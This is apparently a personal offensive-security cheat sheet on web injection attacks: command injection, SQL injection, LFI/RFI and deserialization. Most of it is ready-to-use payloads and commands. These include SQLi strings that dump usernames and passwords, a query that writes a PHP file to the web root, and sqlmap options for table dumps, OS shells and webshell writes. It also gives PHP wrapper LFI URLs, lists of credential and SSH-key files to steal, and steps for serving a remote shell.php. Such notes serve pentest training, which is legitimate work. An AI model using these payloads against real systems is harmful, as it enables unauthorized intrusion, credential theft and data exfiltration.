Injection/LFI

Command and Database 😍

Command Injection

Some functions on a site may actually be running an OS command under the hood. Blind vs visible shows if there's a specific error or problem. We will want to read a world-readable file to determine if the injection was successful.

/etc/passwd                 # Linux world-readable
C:\Windows\win.ini          # Windows world-readable
ping -c 4 m4lwhere.org      # Ping a server I own, determine if blind injection worked
" & ping m4lwhere.org & rem # REM can be used as inline comments to comment out the rest of a Windows based injection

Character

Meaning

;

Execute more commands inline

|

Pipe output from prev command to next command

||

Will execute next command ONLY if previous was UNSUCCESSFUL

&

Send command to a background process

&&

Will execute next command ONLY if previous was SUCCESSFUL

>

Output to file and overwrite

>>

Output to file and append

<

Input from a file

#

Comment out the rest of the command, very useful if there's a lot of command left after the injection point

?

Single wildcard, can be used contiguously

[1-9]

Character set, finds anything in that array

{echo,hello,there}

Bash parameter expansion, will execute echo hello there

`id`

Command substitution, will execute before rest of command

$(id)

Command substitution

${IFS}

Internal Field Separator, used to add spaces w/o spaces

Tools

Programs such as commix make command injection very easy, just keep in mind that it may overwhelm the server.

SQLi

Super fun, get in the database and dump it. To test SQLi, we will put special characters into the input fields and observe errors returned by the application. Blind SQLi revolves around mostly types of sleep timing, concatenation, or some binary truths/falsehoods to be found.

'
"
')
")
'; -- 
"; --
'); -- 
"); --
' or 1=1; --
' or 1; --
' or 'a'='a    # Quote balancing, expects that theres another "'" at the end
SELECT @@version    # Determine what the database information is
SELECT name, sql FROM sqlite_master    # For sqlite databases

Injection Points

Just like anything else, we want to FUZZ EVERYTHING. Generally, these injection points are located at the places below:

  • GET parameters

  • POST data parameters

  • HTTP cookies (Think ones that show an access level)

  • HTTP User Agent

Blind SQLi

Generally occurs when an application has a custom error when db errors occur, which makes identifying and exploiting SQLi more difficult. Concatenating strings for known good values can determine if the SQL database is directing interpreting the values we're providing.

m4l'/**/'where == m4l' 'where == m4lwhere'; # All of these values are the same according to SQL concatenation

Boolean testing can help determine blind SQLi vulnerabilities as well, place a known good value but put a đŸ’¯ falsity with it, compare with a known good value and a đŸ’¯ truity with it :)

m4lwhere' AND 1; --     # Test if value is true, if username is valid then good
m4lwhere' AND 0; --     # Test if SQLi is being interpreted, known good username but always false 0

Verbs

Verbs

Meaning

SELECT

Retrieve content from a table

INSERT

Add content to a table

UPDATE

Modify data on a table

DELETE

Remove data from a table

DROP

Drop the WHOLE table

UNION

Combine data from one or more tables

Query Modifiers

Modifier

Meaning

WHERE

Needs to meet a certain conditional first

AND

Must meet both conditions

OR

Must meet at least one condition

LIMIT #1,#10

Limit rows returned to #10, starting from row #1

ORDER BY user

Sort by column user when presenting data

SQL Characters

Character

Meaning

', "

String delimiter

;

End of a SQL statement

--, #, /*

Comment characters

||, +, " "

String concatenation, add two strings together!

+, <, >, =

General arithmetic

()

Used to call subqueries or functions

%00

Null byte

Union Attacks

Used to identify and gather information from other tables or DBs to steal information. Must have the same number of columns in the original vulnerable SQL statement! We can ask politely to identify how many columns are returned, then work from there. https://portswigger.net/web-security/sql-injection/union-attacks

# Repeat until error! Error returned when too many columns are asked to be sorted.
' ORDER by 1-- 
' ORDER by 2-- 
' ORDER by 3--

# Select NULL values to add to existing data returned
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- 

# Example Exploit, unions the intended results with additional info
' UNION SELECT username, password FROM users-- 

Exploitation and Exfil

Use stacked queries to create new tables with data to be exfiled.

m4lwhere'; CREATE TABLE exfil(data varchar(1000));-- 
LOAD_FILE()    # Used to read a file, MySQL
BULK INSERT    # Used to read a file, SQL Server
# Potential XSS payloads stored in db and presented on site

Tools

There's a ton of useful tools, sqlmap is the most useful for exploitation imo. The mysql program is available on most hosts and is easy to connect to and manage.

# Built-in mysql tools
mysql -u root    # Attempt to connect to db as root user, default is no pass
mysql -u root -p -h 10.10.10.1    # Connect to db at host 10.10.10.1 as root, prompts for password
mysql -u user1 -puser1pass    # Connect to local db. NOTE no space after '-p' for password!
mysqlshow -u theseus -piamkingtheseus    # Again, NO SPACE AFTER -p FOR PASSWORD

# Inside the mysql shell
show databases;          # List all dbs on server  
use wordpress;           # Use a specific db
show tables;             # Show all tables for current db
describe wp_users;       # Show columns for a specific table
select * from wp_users;  # Dump all records from a table
group_concat(user_login) # gather all records from the user_login column as one result
select load_file('/etc/passwd');    # Read a local file
select "<?php phpinfo() ?>" into outfile "/var/www/html/haha.php";    # Write a php file to the web root
# SQLMap Usage and Examples
sqlmap –u "http://website.target/login.jsp" –data 'user=m4lwhere&pass=badpass' # POST request with data
sqlmap -u "http://172.30.78.35/view.php?id=1"    # GET request
sqlmap -u "http://172.30.77.28/view.php?id=1&Search=Submit" -p id --cookie='PHPSESSID:sqdmeggl8nhp7kq63anc56hi77'     # GET request with a PHP session cookie, also explicitly states to inject on the 'id' param
    --user-agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'     # Default user agent is sqlmap, not subtle!
    --proxy http://127.0.0.1:8080     # Proxies all connections thru burp or something
    --referer http://m4lwhere.org/signup.php     # Adds the referer header to make requests less suspicious, some WAFs enforce referer for pages
sqlmap -u "http://172.30.78.35/view.php?id=1" --dbs       # Lists all dbs on the host
sqlmap -u "http://172.30.78.35/view.php?id=1" --tables    # Lists all tables inside all dbs on host

# After an injeciton point is found, use sqlmap to explore the db
--dbs    # List all dbs
--tables    # List all tables, does not require a -D database, will list all tables from all dbs without it!
--all    # List all info about the database
-D website --tables    # List all tables from the 'website' db
-D website -T users --columns    # List all columns from the 'users' table in the 'website' db
-D website -T users --dump    # Dump the 'users' table :)
--os-shell    # Attempt to get an interactive shell
--file-read /etc/passwd    # Attempt to read a system file
--file-write     # Create a php webshell or something
--reg-add    # Add a windows reg key (think a powershell startup script)
--reg-del    # Deletes a windows reg key

LFI/RFI

LFI Files to Read

If we find we have LFI, we can try to find interesting files. Keep in mind some of these attacks will require the file to be encoded before they are served by PHP. Additionally, we can ask the site to load PHP we provide directly as well.

http://example.thm.labs/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd
http://example.thm.labs/page.php?file=filter/read=string.rot13/resource=/etc/passwd
http://example.thm.labs/page.php?file=data://text/plain;base64,QW9DMyBpcyBmdW4hCg==
# Unix based files of interest
/etc/passwd
/etc/group
/etc/shadow              # Very unlikely but worth a shot
/etc/os-release
/etc/issue
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

# Windows based files of interest
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf

# Config files
./.htacccess
./.htpasswd
./login.php               # Find the login.php page and which page hosts the database credentials
log files                 # Potential Log poisoning if logs are rendered on the page
wp-config.php             # Wordpress config, contains mysql creds

# PHP Session Storage
c:\Windows\Temp
/tmp/
/var/lib/php5
/var/lib/php/session

# SSH Keys
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
~/.ssh/id_rsa
/var/www/.ssh/authorized_keys     # If a www-user account has write permissions, check home folder in /etc/passwd then attempt to drop a key

Gathering PHP Session Information

To find the PHP session file name, PHP, by default uses the following naming scheme, sess_<SESSION_ID> where we can find the SESSION_ID using the browser and verifying cookies sent from the server.

To find the session ID in the browser, you can open the developer tools (SHIFT+CTRL+I), then the Application tab. From the left menu, select Cookies and select the target website. There is a PHPSESSID and the value. In my case, the value is vc4567al6pq7usm2cufmilkm45. Therefore, the file will be as sess_vc4567al6pq7usm2cufmilkm45. Finally, we know it is stored in /tmp. Now we can use the LFI to call the session file.

Serving RFI

A server/firewall might be blocking outbound HTTP for RFI, but could potentially allow outbound SMB to serve up the malicious page!

# Basic python
python3 -m http.server 8081
http://127.0.0.1:8081/shell.php

# SMB hosting
[serve up smb hosting with impacket]
\\127.0.0.1\shell.php

Deserialization Attacks

Injection attacks where data stored as bytes is later interpreted as instructions. issue with any object-oriented programming language. Serialized objects may be stored on the client side before they are transferred to the server to be added to the web app.

RCE from deserialization most often occurs from a JVM with a readObject() call, where an attacker supplies an object to be used.

Programs such as ysoserial.jar can be used to generate our code, creating by hand is a huge list of chained serialized objects.

References

Last updated